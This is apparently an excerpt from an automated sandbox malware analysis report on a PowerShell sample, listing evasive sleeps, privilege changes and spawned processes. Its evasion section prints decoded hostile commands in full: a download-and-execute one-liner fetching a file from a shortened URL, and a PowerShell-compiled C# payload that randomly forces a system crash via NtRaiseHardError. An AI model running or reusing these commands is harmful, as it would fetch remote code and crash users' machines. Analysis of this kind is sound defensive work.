Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3863 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6011 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3399 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2223 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6304 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6304 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3384 Thread sleep count: 3399 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3496 Thread sleep count: 2223 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded iwr is.gd/jwr7JD -o $env:TMP/.cmd;& $env:TMP/.cmd
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $s='using System;using System.Text;using System.Security.Cryptography;using System.Runtime.InteropServices;using System.IO;public class X{[DllImport("ntdll.dll")]public static extern uint RtlAdjustPrivilege(int p,bool e,bool c,out bool o);[DllImport("ntdll.dll")]public static extern uint NtRaiseHardError(uint e,uint n,uint u,IntPtr p,uint v,out uint r);public static unsafe string Shot(){bool o;uint r;RtlAdjustPrivilege(19,true,false,out o);NtRaiseHardError(0xc0000022,0,0,IntPtr.Zero,6,out r);byte[]c=Convert.FromBase64String("RNo8TZ56Rv+EyZW73NocFOIiNFfL45tXw24UogGdHkswea/WhnNhCNwjQn1aWjfw");byte[]k=Convert.FromBase64String("/a1Y+fspq/NwlcPwpaT3irY2hcEytktuH7LsY+NlLew=");byte[]i=Convert.FromBase64String("9sXGmK4q9LdYFdOp4TSsQw==");using(Aes a=Aes.Create()){a.Key=k;a.IV=i;ICryptoTransform d=a.CreateDecryptor(a.Key,a.IV);using(var m=new MemoryStream(c))using(var y=new CryptoStream(m,d,CryptoStreamMode.Read))using(var s=new StreamReader(y)){return s.ReadToEnd();}}}}';$c=New-Object System.CodeDom.Compiler.CompilerParameters;$c.CompilerOptions='/unsafe';$a=Add-Type -TypeDefinition $s -Language CSharp -PassThru -CompilerParameters $c;if((Get-Random -Min 1 -Max 7) -eq 1){[X]::Shot()}Start-Process "powershell.exe"
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $s='using System;using System.Text;using System.Security.Cryptography;using System.Runtime.InteropServices;using System.IO;public class X{[DllImport("ntdll.dll")]public static extern uint RtlAdjustPrivilege(int p,bool e,bool c,out bool o);[DllImport("ntdll.dll")]public static extern uint NtRaiseHardError(uint e,uint n,uint u,IntPtr p,uint v,out uint r);public static unsafe string Shot(){bool o;uint r;RtlAdjustPrivilege(19,true,false,out o);NtRaiseHardError(0xc0000022,0,0,IntPtr.Zero,6,out r);byte[]c=Convert.FromBase64String("RNo8TZ56Rv+EyZW73NocFOIiNFfL45tXw24UogGdHkswea/WhnNhCNwjQn1aWjfw");byte[]k=Convert.FromBase64String("/a1Y+fspq/NwlcPwpaT3irY2hcEytktuH7LsY+NlLew=");byte[]i=Convert.FromBase64String("9sXGmK4q9LdYFdOp4TSsQw==");using(Aes a=Aes.Create()){a.Key=k;a.IV=i;ICryptoTransform d=a.CreateDecryptor(a.Key,a.IV);using(var m=new MemoryStream(c))using(var y=new CryptoStream(m,d,CryptoStreamMode.Read))using(var s=new StreamReader(y)){return s.ReadToEnd();}}}}';$c=New-Object System.CodeDom.Compiler.CompilerParameters;$c.CompilerOptions='/unsafe';$a=Add-Type -TypeDefinition $s -Language CSharp -PassThru -CompilerParameters $c;if((Get-Random -Min 1 -Max 7) -eq 1){[X]::Shot()}Start-Process "powershell.exe" Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd"" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 97 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 98 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 99 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 100 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 101 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 102 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 103 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 104 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 105 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 106 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 107 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 108 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 109 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 110 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 111 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 112 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 113 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 114 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 115 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 116 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 117 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 118 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 119 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 120 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 121 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 122 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 65 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 66 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 67 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 68 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 69 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 70 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 71 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 72 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 109 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 110 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 111 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 112 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 113 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 114 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 79 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 80 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 81 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 82 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 119 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 100 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 101 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 86 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 104 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 88 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 68 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 69 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 70 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 71 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 50 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 51 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 52 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 53 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 113 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 116 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 117 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 57 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 123 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 98 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 63 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 58 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 46 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 104 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 88 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 68 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c exit 69 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGE Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AF.tmp" "c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e jabzad0ajwb1ahmaaqbuagcaiabtahkacwb0aguabqa7ahuacwbpag4azwagafmaeqbzahqazqbtac4avablahgadaa7ahuacwbpag4azwagafmaeqbzahqazqbtac4auwblagmadqbyagkadab5ac4aqwbyahkacab0ag8azwbyageacaboahkaowb1ahmaaqbuagcaiabtahkacwb0aguabqauafiadqbuahqaaqbtagualgbjag4adablahiabwbwafmazqbyahyaaqbjaguacwa7ahuacwbpag4azwagafmaeqbzahqazqbtac4asqbpadsacab1agiababpagmaiabjagwayqbzahmaiabyahsawwbeagwababjag0acabvahiadaaoaciabgb0agqababsac4azabsagwaigapaf0acab1agiababpagmaiabzahqayqb0agkaywagaguaeab0aguacgbuacaadqbpag4adaagafiadabsaeeazabqahuacwb0afaacgbpahyaaqbsaguazwblacgaaqbuahqaiabwacwaygbvag8abaagagualabiag8abwbsacaaywasag8adqb0acaaygbvag8abaagag8akqa7afsarabsagwasqbtahaabwbyahqakaaiag4adabkagwabaauagqababsaciakqbdahaadqbiagwaaqbjacaacwb0ageadabpagmaiablahgadablahiabgagahuaaqbuahqaiaboahqaugbhagkacwblaegayqbyagqarqbyahiabwbyacgadqbpag4adaagagualab1agkabgb0acaabgasahuaaqbuahqaiab1acwasqbuahqauab0ahiaiabwacwadqbpag4adaagahyalabvahuadaagahuaaqbuahqaiabyackaowbwahuaygbsagkaywagahmadabhahqaaqbjacaadqbuahmayqbmaguaiabzahqacgbpag4azwagafmaaabvahqakaapahsaygbvag8abaagag8aowb1agkabgb0acaacga7afiadabsaeeazabqahuacwb0afaacgbpahyaaqbsaguazwblacgamqa5acwadabyahuazqasagyayqbsahmazqasag8adqb0acaabwapadsatgb0afiayqbpahmazqbiageacgbkaeuacgbyag8acgaoadaaeabjadaamaawadaamaayadialaawacwamaasaekabgb0afaadabyac4awgblahiabwasadyalabvahuadaagahiakqa7agiaeqb0aguawwbdagmapqbdag8abgb2aguacgb0ac4argbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciaugboag8aoabuafoanqa2afiadgaraeuaeqbaafcanwazae4abwbjaeyatwbjagkatgbgagyataa0aduadabyahcamga0afuabwbnaecazabiagsacwb3aguayqavafcaaabuae4aaabdae4adwbqafeabgaxageavwbqagyadwaiackaowbiahkadablafsaxqbrad0aqwbvag4adgblahiadaauaeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaaiac8ayqaxafkakwbmahmacabxac8atgb3agwaywbqahcacabhafqamwbpahiawqayaggaywbfahkadabrahqadqbiadcatabzafkakwboagwatablahcapqaiackaowbiahkadablafsaxqbpad0aqwbvag4adgblahiadaauaeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaaiadkacwbyaecabqbladqacqa5aewazabzaeyazabpahaanabuafmacwbrahcapqa9aciakqa7ahuacwbpag4azwaoaeeazqbzacaayqa9aeeazqbzac4aqwbyaguayqb0aguakaapackaewbhac4aswblahkapqbradsayqauaekavga9agkaowbjaemacgb5ahaadabvafqacgbhag4acwbmag8acgbtacaazaa9agealgbdahiazqbhahqazqbeaguaywbyahkacab0ag8acgaoagealgblaguaeqasagealgbjafyakqa7ahuacwbpag4azwaoahyayqbyacaabqa9ag4azqb3acaatqblag0abwbya